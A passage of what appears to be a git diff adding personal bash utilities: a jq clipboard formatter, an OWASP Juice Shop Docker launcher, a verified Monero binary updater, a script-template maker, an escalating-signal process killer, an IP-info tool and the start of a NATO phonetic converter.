# cat file.json | jj # Format from stdin
|
||||
|
||||
VERSION="1.0.0"
|
||||
|
||||
# Print jj's usage text (ANSI bold/cyan via `echo -e`).
show_help() {
    echo -e "\033[1mjj\033[0m - JSON Formatting & Querying Tool v${VERSION}"
    echo
    echo -e "\033[1mUSAGE:\033[0m"
    echo " jj [OPTIONS] [JQ_QUERY]"
    echo
    echo -e "\033[1mOPTIONS:\033[0m"
    echo -e " \033[0;36m-v, --validate\033[0m Validate JSON only (no output)"
    echo -e " \033[0;36m-f, --file\033[0m Format file in place"
    echo -e " \033[0;36m-c, --compact\033[0m Compact JSON (remove whitespace)"
    echo -e " \033[0;36m-i, --stdin\033[0m Read from stdin instead of clipboard"
    echo -e " \033[0;36m-o, --output\033[0m Write to clipboard (default: stdout)"
    echo -e " \033[0;36m-h, --help\033[0m Show this help message"
    echo
    echo -e "\033[1mEXAMPLES:\033[0m"
    echo " jj # Format clipboard JSON"
    echo " jj '.users[0].name' # Query clipboard with jq"
    echo " jj -v # Validate clipboard JSON"
    echo " jj -f data.json # Format file in place"
    echo " jj -c # Compact clipboard JSON"
    echo " cat file.json | jj # Format from stdin"
    echo " curl api.com | jj '.data' # Query API response"
    echo
    echo -e "\033[1mNOTE:\033[0m"
    echo " Requires jq to be installed for querying"
}
|
||||
|
||||
# Clipboard functions
# Both helpers probe for a clipboard tool in the same priority order
# (xsel first, then xclip) and fail with a message when neither exists.

# Print the current X clipboard contents on stdout.
clip_get() {
    local tool
    for tool in xsel xclip; do
        if command -v "$tool" &>/dev/null; then
            case "$tool" in
                xsel)  xsel --output --clipboard ;;
                xclip) xclip -selection clipboard -o ;;
            esac
            return
        fi
    done
    echo "Error: No clipboard tool found" >&2
    return 1
}

# Copy stdin into the X clipboard.
clip_set() {
    local tool
    for tool in xsel xclip; do
        if command -v "$tool" &>/dev/null; then
            case "$tool" in
                xsel)  xsel --input --clipboard ;;
                xclip) xclip -selection clipboard ;;
            esac
            return
        fi
    done
    echo "Error: No clipboard tool found" >&2
    return 1
}
|
||||
|
||||
# Get input (clipboard or stdin)
# Reads stdin when -i/--stdin was requested OR when stdin is not a TTY
# (i.e. data was piped in); otherwise pulls from the clipboard.
# Relies on the global `use_stdin` set by the argument parser below.
get_input() {
    if [[ "${use_stdin}" == "true" ]] || [[ ! -t 0 ]]; then
        # Use stdin if explicitly requested OR if stdin is not a terminal (piped)
        cat
    else
        clip_get
    fi
}
|
||||
|
||||
# Validate JSON
# Check that $1 parses as JSON; print a green check or red cross and
# return 0/1 accordingly. Parse errors from jq are echoed, indented,
# to stderr.
validate_json() {
    local doc=$1
    if echo "$doc" | jq empty 2>/dev/null; then
        echo -e "\033[0;32m✓\033[0m Valid JSON"
        return 0
    fi
    echo -e "\033[0;31m✗\033[0m Invalid JSON:" >&2
    # Re-run jq so its parse error can be captured and displayed.
    echo "$doc" | jq empty 2>&1 | sed 's/^/ /' >&2
    return 1
}
|
||||
|
||||
# Format JSON (pretty print)
# printf (not echo) so documents that look like echo options ("-n", "-e",
# ...) are passed through to jq verbatim instead of being swallowed.
format_json() {
    local input=$1
    printf '%s\n' "$input" | jq .
}

# Compact JSON
# Strip all insignificant whitespace (jq -c).
compact_json() {
    local input=$1
    printf '%s\n' "$input" | jq -c .
}

# Query JSON with jq
# $1 = JSON document, $2 = jq filter expression.
query_json() {
    local input=$1
    local query=$2
    printf '%s\n' "$input" | jq "$query"
}
|
||||
|
||||
# Parse arguments
# mode selects the single action to perform; any non-option argument is
# interpreted as a jq query (and forces mode=query).
mode="format"
use_stdin=false
to_clipboard=false
file_path=""
jq_query=""

while [[ $# -gt 0 ]]; do
    case $1 in
        -v|--validate)
            mode="validate"
            shift
            ;;
        -f|--file)
            # NOTE(review): assumes a value follows; `jj -f` with no path
            # trips `set -u` on "$2" -- confirm whether that is acceptable.
            mode="file"
            file_path="$2"
            shift 2
            ;;
        -c|--compact)
            mode="compact"
            shift
            ;;
        -i|--stdin)
            use_stdin=true
            shift
            ;;
        -o|--output)
            to_clipboard=true
            shift
            ;;
        -h|--help)
            show_help
            exit 0
            ;;
        *)
            # Assume it's a jq query
            jq_query="$1"
            mode="query"
            shift
            ;;
    esac
done

# Check if jq is installed
if ! command -v jq &>/dev/null; then
    echo -e "\033[0;31mError:\033[0m jq is not installed" >&2
    echo "Install it with: sudo apt install jq" >&2
    exit 1
fi

# Main logic
# Each branch reads its input (clipboard or stdin via get_input), applies
# the transformation, then writes to stdout or back to the clipboard.
case "$mode" in
    validate)
        input=$(get_input)
        validate_json "$input"
        ;;

    file)
        if [[ ! -f "$file_path" ]]; then
            echo -e "\033[0;31mError:\033[0m File not found: $file_path" >&2
            exit 1
        fi

        # Validate first
        if ! jq empty "$file_path" 2>/dev/null; then
            echo -e "\033[0;31mError:\033[0m Invalid JSON in file" >&2
            jq empty "$file_path" 2>&1 | sed 's/^/ /' >&2
            exit 1
        fi

        # Format in place
        # Write to a temp file first so a jq failure cannot truncate the original.
        temp_file=$(mktemp)
        jq . "$file_path" > "$temp_file"
        mv "$temp_file" "$file_path"
        echo -e "\033[0;32m✓\033[0m Formatted: $file_path"
        ;;

    compact)
        input=$(get_input)
        output=$(compact_json "$input")

        if [[ "$to_clipboard" == "true" ]]; then
            echo -n "$output" | clip_set
            echo -e "\033[0;32m✓\033[0m Copied compacted JSON to clipboard"
        else
            echo "$output"
        fi
        ;;

    query)
        input=$(get_input)
        output=$(query_json "$input" "$jq_query")

        if [[ "$to_clipboard" == "true" ]]; then
            echo -n "$output" | clip_set
            echo -e "\033[0;32m✓\033[0m Copied query result to clipboard"
        else
            echo "$output"
        fi
        ;;

    format)
        input=$(get_input)
        output=$(format_json "$input")

        if [[ "$to_clipboard" == "true" ]]; then
            echo -n "$output" | clip_set
            echo -e "\033[0;32m✓\033[0m Copied formatted JSON to clipboard"
        else
            echo "$output"
        fi
        ;;
esac
|
||||
172
scripts/jshop
Executable file
172
scripts/jshop
Executable file
|
|
@ -0,0 +1,172 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
# Script Name: jshop
|
||||
# Description: OWASP Juice Shop launcher
|
||||
# Usage: jshop start|stop|status|logs
|
||||
|
||||
VERSION="1.0.0"

# Colors
# Literal ANSI escape sequences -- must be printed with `echo -e` to render.
readonly RED='\033[0;31m'
readonly GREEN='\033[0;32m'
readonly YELLOW='\033[1;33m'
readonly CYAN='\033[0;36m'
readonly BOLD='\033[1m'
readonly NC='\033[0m'

# Docker identifiers shared by every subcommand below.
CONTAINER_NAME="juice-shop"
IMAGE="bkimminich/juice-shop"
DEFAULT_PORT="3000"
|
||||
|
||||
# Find available port
# Echo the first free TCP port at or above $1 (default 3000) on stdout;
# "port in use" warnings go to stderr so command substitution stays clean.
find_available_port() {
    local port="${1:-3000}"
    # Probe with whichever unprivileged tool exists: lsof, then ss, then
    # netstat. (The previous version invoked `sudo netstat`, which could
    # hang the script on a password prompt just to check a port.)
    _port_busy() {
        if command -v lsof &>/dev/null; then
            lsof -Pi ":$1" -sTCP:LISTEN -t >/dev/null 2>&1
        elif command -v ss &>/dev/null; then
            ss -tln 2>/dev/null | grep -q ":$1 "
        elif command -v netstat &>/dev/null; then
            netstat -tuln 2>/dev/null | grep -q ":$1 "
        else
            return 1  # no probe tool available: assume the port is free
        fi
    }
    while _port_busy "$port"; do
        echo -e "${YELLOW}⚠${NC} Port $port in use, trying next..." >&2
        port=$((port + 1))
    done
    echo "$port"
}
|
||||
|
||||
# Print jshop's usage text (colors rendered via `echo -e`).
show_help() {
    echo -e "${BOLD}jshop${NC} - OWASP Juice Shop Launcher v${VERSION}"
    echo
    echo -e "${BOLD}USAGE:${NC}"
    echo " jshop <command>"
    echo
    echo -e "${BOLD}COMMANDS:${NC}"
    echo -e " ${CYAN}start${NC} Start Juice Shop"
    echo -e " ${CYAN}stop${NC} Stop Juice Shop"
    echo -e " ${CYAN}restart${NC} Restart Juice Shop"
    echo -e " ${CYAN}status${NC} Check if running"
    echo -e " ${CYAN}logs${NC} Show container logs"
    echo -e " ${CYAN}shell${NC} Open shell in container"
    echo
    echo -e "${BOLD}EXAMPLES:${NC}"
    echo " jshop start # Launch Juice Shop"
    echo " jshop stop # Stop Juice Shop"
    echo " jshop logs # View logs"
    echo
    echo -e "${BOLD}ACCESS:${NC}"
    echo " URL: ${BOLD}http://localhost:\$PORT${NC} (auto-detects available port)"
    echo
    echo -e "${BOLD}ABOUT:${NC}"
    echo " OWASP Juice Shop - Intentionally insecure web application"
    echo " Perfect for testing: XSS, SQLi, auth bypass, IDOR, etc."
    echo " Docs: https://pwning.owasp-juice.shop/"
}
|
||||
|
||||
# Abort the whole script unless the docker CLI is on PATH.
check_docker() {
    command -v docker &>/dev/null && return
    echo -e "${RED}Error:${NC} Docker not installed"
    exit 1
}
|
||||
|
||||
# Launch Juice Shop: reuse a running container, restart a stopped one, or
# pull the image and create a fresh container on a free port.
start_jshop() {
    # Find available port only when starting
    PORT=$(find_available_port "$DEFAULT_PORT")

    # Container exists at all (running or stopped)?
    if docker ps -a --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
        if docker ps --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
            # Already running: just report its actual published port.
            echo -e "${YELLOW}⚠${NC} Juice Shop already running"
            CURRENT_PORT=$(docker port "$CONTAINER_NAME" 3000 | cut -d: -f2)
            echo -e "${CYAN}[*]${NC} Access at: ${BOLD}http://localhost:${CURRENT_PORT}${NC}"
            return 0
        else
            # NOTE(review): `docker start` reuses the container's original
            # port mapping, so the freshly probed $PORT printed below may
            # not match the real port in this branch -- confirm.
            echo -e "${CYAN}[*]${NC} Starting existing container..."
            docker start "$CONTAINER_NAME"
        fi
    else
        echo -e "${CYAN}[*]${NC} Pulling ${IMAGE}..."
        docker pull "$IMAGE"
        echo -e "${CYAN}[*]${NC} Starting Juice Shop..."
        docker run -d --name "$CONTAINER_NAME" -p "${PORT}:3000" "$IMAGE"
    fi

    echo -e "${GREEN}✓${NC} Juice Shop started"
    if [[ "$PORT" != "$DEFAULT_PORT" ]]; then
        echo -e "${YELLOW}⚠${NC} Using port ${PORT} (default ${DEFAULT_PORT} was in use)"
    fi
    echo -e "${CYAN}[*]${NC} Access at: ${BOLD}http://localhost:${PORT}${NC}"
}
|
||||
|
||||
# Stop the container if it is currently running; otherwise just warn.
stop_jshop() {
    if ! docker ps --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
        echo -e "${YELLOW}⚠${NC} Juice Shop not running"
        return
    fi
    echo -e "${CYAN}[*]${NC} Stopping Juice Shop..."
    docker stop "$CONTAINER_NAME"
    echo -e "${GREEN}✓${NC} Juice Shop stopped"
}

# Stop, pause briefly so the port is released, then start again.
restart_jshop() {
    stop_jshop
    sleep 2
    start_jshop
}
|
||||
|
||||
# Report whether the container is running and where it is reachable.
show_status() {
    if docker ps --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
        echo -e "${GREEN}●${NC} Juice Shop is ${GREEN}running${NC}"
        # Published host port for container port 3000 (e.g. "0.0.0.0:3000" -> "3000").
        CURRENT_PORT=$(docker port "$CONTAINER_NAME" 3000 2>/dev/null | cut -d: -f2)
        echo -e "${CYAN}[*]${NC} Access at: ${BOLD}http://localhost:${CURRENT_PORT}${NC}"
        docker ps --format "table {{.Names}}\t{{.Status}}\t{{.Ports}}" | grep -E "(NAMES|${CONTAINER_NAME})"
    else
        echo -e "${RED}●${NC} Juice Shop is ${RED}stopped${NC}"
    fi
}

# Follow the container's logs (blocks until interrupted with Ctrl-C).
show_logs() {
    if docker ps --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
        docker logs -f "$CONTAINER_NAME"
    else
        echo -e "${RED}Error:${NC} Juice Shop not running"
        exit 1
    fi
}

# Open an interactive /bin/sh inside the running container.
open_shell() {
    if docker ps --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
        docker exec -it "$CONTAINER_NAME" /bin/sh
    else
        echo -e "${RED}Error:${NC} Juice Shop not running"
        exit 1
    fi
}
|
||||
|
||||
# Main
# Entry point: require docker, then dispatch on the subcommand. A missing
# subcommand falls through to the help text, same as -h/--help/help.
check_docker

cmd="${1:-help}"

case "$cmd" in
    -h|--help|help)
        show_help
        exit 0
        ;;
    start|up)
        start_jshop
        ;;
    stop|down)
        stop_jshop
        ;;
    restart)
        restart_jshop
        ;;
    status)
        show_status
        ;;
    logs)
        show_logs
        ;;
    shell|sh|bash)
        open_shell
        ;;
    *)
        echo -e "${RED}Error:${NC} Unknown command: $1"
        echo "Run 'jshop --help' for usage"
        exit 1
        ;;
esac
|
||||
52
scripts/md_update.sh
Executable file
52
scripts/md_update.sh
Executable file
|
|
@ -0,0 +1,52 @@
|
|||
#!/bin/bash
# Download, verify, and install the latest Monero CLI binaries, then
# restart the monerod service. Requires: wget, shasum, sudo, systemd.
# NOTE(review): `set -evo` enables -v (echo every line read); this looks
# like a typo for the usual `set -euo pipefail` -- confirm intent.
set -evo pipefail

echo "[*] Monero Updating"
echo "[-] Removing old monero binaries..."
rm -rf monero-*-linux-*

echo -e "[*] Checking architecture..."

# Pick the download matching the CPU architecture.
# NOTE(review): "armv71" is likely a typo for "armv7l" (`arch` output) -- verify.
if [[ $(arch) = "x86_64" ]]; then
    # Download latest 64-bit binaries
    echo "[*] Download latest Linux binaries..."
    wget -q --content-disposition https://downloads.getmonero.org/cli/linux64
elif [[ $(arch) = "aarch64" || $(arch) = "aarm64" || $(arch) = "armv8" ]]; then
    # Download latest armv8 binaries
    echo "[*] Download latest Linux Arm8 binaries..."
    wget -q --content-disposition https://downloads.getmonero.org/cli/linuxarm8
elif [[ $(arch) = "armv71" ]]; then
    # Download latest armv7 binaries
    echo "[*] Download latest Linux Arm7 binaries..."
    wget -q --content-disposition https://downloads.getmonero.org/cli/linuxarm7
else
    echo -e "\e[31m[!] ERROR: Architecture not found. Please see https://www.getmonero.org/downloads/ to download manually.\e[0m"
    exit 1
fi

# Verify shasum of downloaded binaries
# NOTE(review): hashes.txt is never downloaded by this script -- it must
# already exist (and be trusted/signature-checked) in the working directory.
echo "[*] Verifying hashes of downloaded binaries..."
if shasum -a 256 -c hashes.txt -s --ignore-missing
then
    echo
    echo "[~] Success: The downloaded binaries verified properly!"
else
    echo
    echo -e "\e[31m[!] DANGER: The download binaries have been tampered with or corrupted.\e[0m"
    rm -rf monero-linux-*.tar.bz2
    exit 1
fi

echo "[~] Extracting new monero binaries..."
tar xvf monero-linux-*.tar.bz2
rm monero-linux-*.tar.bz2

# Stop the daemon before swapping the binaries it runs from.
echo "[-] Stopping monerod..."
sudo systemctl stop monerod

echo "[~] Copying binaries to /usr/local/bin/"
sudo cp -r monero-*-linux-*/* /usr/local/bin/
sudo chown -R monero:monero /usr/local/bin/monero*

echo "[+] Starting monerod..."
sudo systemctl start monerod
|
||||
24
scripts/mksh
Executable file
24
scripts/mksh
Executable file
|
|
@ -0,0 +1,24 @@
|
|||
#!/usr/bin/env bash
set -euo pipefail

# Script Name: mksh
# Description: Rapidly create executable bash scripts with template
# Source: https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/

target="${1:-}"

# Exactly one argument, and it must not clobber an existing path.
if [[ $# -ne 1 ]]; then
    echo 'mksh takes one argument' >&2
    exit 1
fi
if [[ -e "$target" ]]; then
    echo "$target already exists" >&2
    exit 1
fi

# Seed the new file with a strict-mode bash template (shebang, set line,
# one blank line to start writing under).
printf '%s\n' '#!/usr/bin/env bash' 'set -euo pipefail' '' > "$target"

chmod +x "$target"

# Drop straight into the user's editor (vim by default).
"${EDITOR:-vim}" "$target"
|
||||
124
scripts/murder
Executable file
124
scripts/murder
Executable file
|
|
@ -0,0 +1,124 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
# Script Name: murder
|
||||
# Description: Gracefully terminate processes with escalating signals
|
||||
# Source: https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
|
||||
# Credit: Evan Hahn - https://codeberg.org/EvanHahn/dotfiles
|
||||
# Usage: murder 1234 # kill PID
|
||||
# murder :8080 # kill process on port 8080
|
||||
# murder firefox # kill process by name
|
||||
# murder # interactive fzf picker (integrated with your k alias!)
|
||||
|
||||
# Signal escalation: [signal, wait_seconds]
# SIGTERM (15) -> SIGINT (2) -> SIGHUP (1) -> SIGKILL (9)
# Each entry is "<signal> <seconds to wait before the next attempt>".
SIGNALS=("15 3" "2 3" "1 4" "9 0")

# Terminate PID $1 by escalating through SIGNALS, checking between each
# step whether the process already exited. Returns 0 on success, 1 when
# the PID does not exist or survives even SIGKILL.
murder_pid() {
    local pid=$1

    if ! ps -p "$pid" > /dev/null 2>&1; then
        echo "Process $pid not found" >&2
        return 1
    fi

    local process_name=$(ps -p "$pid" -o comm= 2>/dev/null || echo "unknown")
    echo "Terminating $process_name (PID: $pid)..."

    for sig_wait in "${SIGNALS[@]}"; do
        # Unpack "signal wait" pair into two variables.
        read -r sig wait <<< "$sig_wait"

        # Bail out early if a previous signal already did the job.
        if ! ps -p "$pid" > /dev/null 2>&1; then
            echo "✓ Process terminated successfully"
            return 0
        fi

        case $sig in
            15) echo " → Sending SIGTERM (polite shutdown)..." ;;
            2) echo " → Sending SIGINT (interrupt)..." ;;
            1) echo " → Sending SIGHUP (hangup)..." ;;
            9) echo " → Sending SIGKILL (force kill)..." ;;
        esac

        # || true: the process may die between the ps check and the kill.
        kill -"$sig" "$pid" 2>/dev/null || true

        # Give the process time to shut down before escalating.
        if [[ $wait -gt 0 ]]; then
            sleep "$wait"
        fi
    done

    if ps -p "$pid" > /dev/null 2>&1; then
        echo "✗ Failed to terminate process" >&2
        return 1
    fi

    echo "✓ Process terminated"
}
|
||||
|
||||
# If no arguments, use fzf to select process (like your k alias!)
# Argument forms handled below: none (interactive fzf picker), a numeric
# PID, ":<port>" (process listening on that port), or a process-name
# pattern for pgrep -f.
if [[ $# -eq 0 ]]; then
    if ! command -v fzf &>/dev/null; then
        echo "Error: fzf not found. Install fzf or provide PID/name/port as argument." >&2
        exit 1
    fi

    selected=$(ps aux | fzf --header="Select process to terminate (graceful escalation)" \
        --header-lines=1 \
        --preview='echo "Will attempt: SIGTERM → SIGINT → SIGHUP → SIGKILL"')

    if [[ -n "$selected" ]]; then
        # Column 2 of `ps aux` output is the PID.
        pid=$(echo "$selected" | awk '{print $2}')
        murder_pid "$pid"
    fi
    exit 0
fi

# Parse argument: PID, :port, or process name
arg="$1"

if [[ "$arg" =~ ^[0-9]+$ ]]; then
    # Argument is a PID
    murder_pid "$arg"
elif [[ "$arg" =~ ^:[0-9]+$ ]]; then
    # Argument is a port (e.g., :8080)
    port="${arg:1}"
    pid=$(lsof -ti ":$port" 2>/dev/null || true)

    if [[ -z "$pid" ]]; then
        echo "No process found listening on port $port" >&2
        exit 1
    fi

    echo "Found process on port $port:"
    ps -p "$pid" -o pid,comm,args | tail -1
    murder_pid "$pid"
else
    # Argument is a process name
    pids=$(pgrep -f "$arg" || true)

    if [[ -z "$pids" ]]; then
        echo "No processes found matching: $arg" >&2
        exit 1
    fi

    # If multiple processes, show list and let user choose
    count=$(echo "$pids" | wc -l)
    if [[ $count -gt 1 ]]; then
        echo "Multiple processes found matching '$arg':"
        # $pids deliberately unquoted: one word per PID for ps.
        ps -p $pids -o pid,comm,args

        if command -v fzf &>/dev/null; then
            selected=$(ps -p $pids | fzf --header-lines=1)
            if [[ -n "$selected" ]]; then
                pid=$(echo "$selected" | awk '{print $1}')
                murder_pid "$pid"
            fi
        else
            echo -n "Enter PID to terminate: "
            # -r: do not let backslashes in the typed PID be interpreted.
            read -r pid
            murder_pid "$pid"
        fi
    else
        murder_pid "$pids"
    fi
fi
|
||||
248
scripts/myip
Executable file
248
scripts/myip
Executable file
|
|
@ -0,0 +1,248 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
# Script Name: myip
|
||||
# Description: Show external and internal IP addresses with optional features
|
||||
# Usage: myip # Show all IPs
|
||||
# myip -e # External IP only
|
||||
# myip -i # Internal IPs only
|
||||
# myip -c # Copy external IP to clipboard
|
||||
# myip -j # JSON output
|
||||
# myip -a # All info (IPs + gateway + DNS)
|
||||
|
||||
VERSION="1.0.0"

# Colors
# Literal ANSI escape sequences -- must be printed with `echo -e` to render.
readonly RED='\033[0;31m'
readonly GREEN='\033[0;32m'
readonly YELLOW='\033[1;33m'
readonly BLUE='\033[0;34m'
readonly CYAN='\033[0;36m'
readonly MAGENTA='\033[0;35m'
readonly BOLD='\033[1m'
readonly NC='\033[0m'
|
||||
|
||||
# Print myip's usage text (colors rendered via `echo -e`).
show_help() {
    echo -e "${BOLD}myip${NC} - IP Address Information Tool v${VERSION}"
    echo
    echo -e "${BOLD}USAGE:${NC}"
    echo " myip [OPTIONS]"
    echo
    echo -e "${BOLD}OPTIONS:${NC}"
    echo -e " ${CYAN}-e, --external${NC} Show external IP only"
    echo -e " ${CYAN}-i, --internal${NC} Show internal IPs only"
    echo -e " ${CYAN}-c, --copy${NC} Copy external IP to clipboard"
    echo -e " ${CYAN}-j, --json${NC} Output as JSON"
    echo -e " ${CYAN}-a, --all${NC} Show all network info (IPs + gateway + DNS)"
    echo -e " ${CYAN}-h, --help${NC} Show this help message"
    echo
    echo -e "${BOLD}EXAMPLES:${NC}"
    echo " myip # Show both external and internal IPs"
    echo " myip -e # External IP only"
    echo " myip -c # Copy external IP to clipboard"
    echo " myip -j # JSON format for scripting"
    echo " myip -a # Complete network information"
    echo
    echo -e "${BOLD}OUTPUT:${NC}"
    echo " External IP, Internal IPs, Gateway (with -a), DNS servers (with -a)"
}
|
||||
|
||||
# Get external IP with fallback sources
# Echoes the first plausible IPv4 address obtained from a list of public
# "what is my IP" endpoints; returns 1 (with a note on stderr) if all fail.
get_external_ip() {
    local ip=""

    # Try multiple sources for reliability.
    # local -a: the original leaked `sources` into the global namespace.
    local -a sources=(
        "https://ifconfig.me"
        "https://api.ipify.org"
        "https://icanhazip.com"
        "https://checkip.amazonaws.com"
    )

    local source
    for source in "${sources[@]}"; do
        # -s silent, -f fail on HTTP errors, 3s budget per endpoint.
        # `|| true` keeps a curl/pipefail failure from aborting the whole
        # script under `set -e` before the fallback sources are tried.
        ip=$(curl -sf --max-time 3 "$source" 2>/dev/null | tr -d '[:space:]' || true)
        # Sanity-check the result looks like a dotted quad before trusting it.
        if [[ -n "$ip" ]] && [[ "$ip" =~ ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$ ]]; then
            echo "$ip"
            return 0
        fi
    done

    echo "unable to fetch" >&2
    return 1
}
|
||||
|
||||
# Get internal IPs
# Lists non-loopback IPv4 addresses, one per line (addresses only).
# NOTE(review): grep -P (PCRE lookbehind) is GNU-grep-only; the ifconfig
# branch is the fallback for macOS/BSD -- confirm that covers all targets.
get_internal_ips() {
    if command -v ip &>/dev/null; then
        # Modern Linux
        ip -4 addr show | grep -oP '(?<=inet\s)\d+(\.\d+){3}' | grep -v '127.0.0.1'
    elif command -v ifconfig &>/dev/null; then
        # macOS / older Linux
        ifconfig | grep -Eo 'inet (addr:)?([0-9]*\.){3}[0-9]*' | grep -Eo '([0-9]*\.){3}[0-9]*' | grep -v '127.0.0.1'
    else
        echo "No network tools found" >&2
        return 1
    fi
}

# Get internal IPs with interface names
# Same as above but emits "iface:address" pairs, one per line, for display.
get_internal_ips_detailed() {
    if command -v ip &>/dev/null; then
        # awk state machine: remember the interface from the "N: name:" header
        # line, then print it with each non-loopback inet address that follows.
        ip -4 addr show | awk '
            /^[0-9]+:/ { iface = $2; gsub(/:/, "", iface) }
            /inet / && !/127\.0\.0\.1/ {
                split($2, a, "/")
                print iface ":" a[1]
            }
        '
    elif command -v ifconfig &>/dev/null; then
        ifconfig | awk '
            /^[a-z]/ { iface = $1; gsub(/:/, "", iface) }
            /inet / && !/127\.0\.0\.1/ {
                for (i=1; i<=NF; i++) {
                    if ($i == "inet") {
                        print iface ":" $(i+1)
                        break
                    }
                }
            }
        '
    fi
}
|
||||
|
||||
# Get default gateway
# Prints the IPv4 default-gateway address (first match), or "unknown"
# when no routing tool is available.
get_gateway() {
    if command -v ip &>/dev/null; then
        ip route | grep default | awk '{print $3}' | head -1
    elif command -v route &>/dev/null; then
        route -n | grep '^0.0.0.0' | awk '{print $2}' | head -1
    elif command -v netstat &>/dev/null; then
        netstat -rn | grep default | awk '{print $2}' | head -1
    else
        echo "unknown"
    fi
}

# Get DNS servers
# Prints the configured resolver addresses, space-separated, or "unknown"
# when /etc/resolv.conf does not exist.
get_dns_servers() {
    if [[ -f /etc/resolv.conf ]]; then
        # Anchor the match so commented-out "#nameserver ..." lines are not
        # reported (the previous unanchored grep picked those up too).
        grep '^nameserver' /etc/resolv.conf | awk '{print $2}' | tr '\n' ' '
    else
        echo "unknown"
    fi
}
|
||||
|
||||
# JSON output
# Emits one JSON object with external_ip, internal_ips[], gateway and
# dns_servers[]. The arrays are built with sed by wrapping the delimiter-
# joined strings in quotes.
# NOTE(review): when a list is empty this produces [""] rather than [],
# and values are not JSON-escaped -- confirm consumers tolerate that.
json_output() {
    local external_ip=$(get_external_ip || echo "unknown")
    local internal_ips=$(get_internal_ips | tr '\n' ',' | sed 's/,$//')
    local gateway=$(get_gateway)
    local dns=$(get_dns_servers)

    cat << EOF
{
  "external_ip": "$external_ip",
  "internal_ips": [$( echo "$internal_ips" | sed 's/,/","/g; s/^/"/; s/$/"/' )],
  "gateway": "$gateway",
  "dns_servers": [$( echo "$dns" | sed 's/ /","/g; s/^/"/; s/$/"/' )]
}
EOF
}
|
||||
|
||||
# Colorized output
# Human-readable report. $1/$2/$3 are "true"/"false" strings controlling
# the external, internal, and extra (gateway + DNS) sections respectively.
colorized_output() {
    local show_external=${1:-true}
    local show_internal=${2:-true}
    local show_all=${3:-false}

    if [[ "$show_external" == "true" ]]; then
        echo -e "${BOLD}${CYAN}External IP:${NC}"
        # On failure the fallback text carries color codes; echo -e renders them.
        external_ip=$(get_external_ip || echo "${RED}Unable to fetch${NC}")
        echo -e " ${GREEN}$external_ip${NC}"
        echo
    fi

    if [[ "$show_internal" == "true" ]]; then
        echo -e "${BOLD}${CYAN}Internal IPs:${NC}"
        # get_internal_ips_detailed emits "iface:ip" pairs, one per line.
        while IFS=: read -r iface ip; do
            echo -e " ${YELLOW}$iface${NC}: ${GREEN}$ip${NC}"
        done < <(get_internal_ips_detailed)
        echo
    fi

    if [[ "$show_all" == "true" ]]; then
        echo -e "${BOLD}${CYAN}Gateway:${NC}"
        echo -e " ${GREEN}$(get_gateway)${NC}"
        echo

        echo -e "${BOLD}${CYAN}DNS Servers:${NC}"
        # Word-splitting on the space-separated resolver list is intentional.
        for dns in $(get_dns_servers); do
            echo -e " ${GREEN}$dns${NC}"
        done
        echo
    fi
}
|
||||
|
||||
# Parse arguments
# Defaults: show both external and internal IPs, human-readable output.
mode="default"
show_external=true
show_internal=true
show_all=false
copy_to_clipboard=false
json_format=false

while [[ $# -gt 0 ]]; do
    case $1 in
        -e|--external)
            # -e and -i are mutually narrowing: each enables one section
            # and disables the other.
            show_external=true
            show_internal=false
            shift
            ;;
        -i|--internal)
            show_external=false
            show_internal=true
            shift
            ;;
        -c|--copy)
            copy_to_clipboard=true
            shift
            ;;
        -j|--json)
            json_format=true
            shift
            ;;
        -a|--all)
            show_all=true
            shift
            ;;
        -h|--help)
            show_help
            exit 0
            ;;
        *)
            # -e so ${RED}/${NC} render as colors instead of literal
            # '\033[...' text (matches the other echo -e calls in this file).
            echo -e "${RED}Error: Unknown option: $1${NC}" >&2
            echo "Run 'myip --help' for usage information" >&2
            exit 1
            ;;
    esac
done
|
||||
|
||||
# Clipboard helper
# Pipes stdin into the X clipboard; prefers xsel, falls back to xclip.
# Returns 1 with a message when no clipboard tool exists, so the -c path
# fails loudly instead of reporting "Copied" after copying nothing.
clip_set() {
    if command -v xsel &>/dev/null; then
        xsel --input --clipboard
    elif command -v xclip &>/dev/null; then
        xclip -selection clipboard
    else
        echo "Error: No clipboard tool found" >&2
        return 1
    fi
}
|
||||
|
||||
# Main logic
# Output mode precedence: JSON beats clipboard-copy beats the default
# colorized report.
if [[ "$json_format" == "true" ]]; then
    json_output
elif [[ "$copy_to_clipboard" == "true" ]]; then
    external_ip=$(get_external_ip)
    # -n: copy the bare address without a trailing newline.
    echo -n "$external_ip" | clip_set
    echo -e "${GREEN}✓${NC} Copied to clipboard: ${BOLD}$external_ip${NC}"
else
    colorized_output "$show_external" "$show_internal" "$show_all"
fi
|
||||
43
scripts/nato
Executable file
43
scripts/nato
Executable file
|
|
@ -0,0 +1,43 @@
|
|||
#!/usr/bin/env bash
set -euo pipefail

# Script Name: nato
# Description: Convert strings to NATO phonetic alphabet
# Source: Inspired by https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
# Usage: nato bar          # Output: Bravo Alfa Romeo
#        nato "hello 123"

if [[ $# -eq 0 ]]; then
    echo "Usage: nato <string>" >&2
    exit 1
fi

# NATO phonetic alphabet mapping (letters and digits)
declare -A nato_map=(
    [a]="Alfa" [b]="Bravo" [c]="Charlie" [d]="Delta" [e]="Echo"
    [f]="Foxtrot" [g]="Golf" [h]="Hotel" [i]="India" [j]="Juliett"
    [k]="Kilo" [l]="Lima" [m]="Mike" [n]="November" [o]="Oscar"
    [p]="Papa" [q]="Quebec" [r]="Romeo" [s]="Sierra" [t]="Tango"
    [u]="Uniform" [v]="Victor" [w]="Whiskey" [x]="Xray" [y]="Yankee"
    [z]="Zulu"
    [0]="Zero" [1]="One" [2]="Two" [3]="Three" [4]="Four"
    [5]="Five" [6]="Six" [7]="Seven" [8]="Eight" [9]="Niner"
)

